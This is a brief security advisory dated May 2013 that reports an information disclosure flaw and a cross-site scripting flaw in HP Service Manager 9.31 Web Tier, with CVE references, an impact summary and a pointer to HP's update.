You are here

V-146: HP Service Manager Bugs Permit Cross-Site Scripting and Information Disclosure Attacks

May 1, 2013 - 12:43am

Addthis

PROBLEM:

HP Service Manager Bugs Permit Cross-Site Scripting and Information Disclosure Attacks

PLATFORM:

Service Manager v9.31 Web Tier

ABSTRACT:

Two vulnerabilities were reported in HP Service Manager

REFERENCE LINKS:

HP Document ID: c03748875
SecurityTracker Alert ID:  1028496
CVE-2012-5222
CVE-2013-2321

IMPACT ASSESSMENT:

Medium

DISCUSSION:

A remote user can obtain potentially sensitive information [CVE-2012-5222].

Service Manager Web Tier does not properly filter HTML code from user-supplied input before displaying the input [CVE-2013-2321]. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the HP Service Manager Web Tier software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

IMPACT:

A remote user can obtain potentially sensitive information.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the HP Service Manager Web Tier software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

SOLUTION:

HP has provided an update for Service Manager Web Tier that resolves the security vulnerabilities. Download and install the update from The HP Software Support Online (SSO).

Addthis